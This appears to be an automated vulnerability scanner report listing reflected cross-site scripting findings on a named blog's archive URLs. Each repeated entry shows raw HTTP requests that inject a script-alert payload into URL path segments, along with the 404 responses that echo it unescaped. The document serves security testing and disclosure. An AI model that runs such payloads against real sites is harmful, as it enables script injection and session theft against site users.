GET /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d9ba<script>alert(1)</script>060e4b9ef4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0798<script>alert(1)</script>ad8c655c453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f490a<script>alert(1)</script>57eed6c6746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82d62<script>alert(1)</script>a51d01b1831 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e10b<script>alert(1)</script>bac3aa178c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab862<script>alert(1)</script>9916758d92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c196<script>alert(1)</script>20072b4f4e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c182<script>alert(1)</script>7e15c131859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeaa6<script>alert(1)</script>49ec8fcf801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c8e6<script>alert(1)</script>556bf3f5c92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63082<script>alert(1)</script>4fcc9a5c39d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c796c<script>alert(1)</script>b994e2fabda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20951<script>alert(1)</script>3f4155b1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e680<script>alert(1)</script>f859f382f9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c7bb<script>alert(1)</script>5838fc16302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f55fa<script>alert(1)</script>7c644c21c33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9be9<script>alert(1)</script>acf0b51a28e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bafa8<script>alert(1)</script>40e95af5aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18bad<script>alert(1)</script>8f17e8b3118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
